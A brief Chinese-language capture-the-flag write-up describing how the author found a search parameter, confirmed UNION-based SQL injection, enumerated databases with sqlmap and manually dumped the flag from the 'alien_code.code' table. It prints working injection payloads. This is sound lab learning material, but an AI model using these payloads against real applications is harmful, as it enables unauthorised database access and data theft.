进入页面后什么也没发现,通过抓包看到一个可以参数
跟着参数走可以看到一个这样的页面
看大佬的wp接下来使用联合查询进行探测
当查询两个字段时可以正常显示
/query?search=amazonis_planitia union select 1,2
使用sqlmap扫描
扫描到这几个库,看名字应该是在alien_code中
扫描该库的表
扫描该表的列名
然后使用sqlmap --dump 不出来内容,只好手工
/query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code
成功获得flag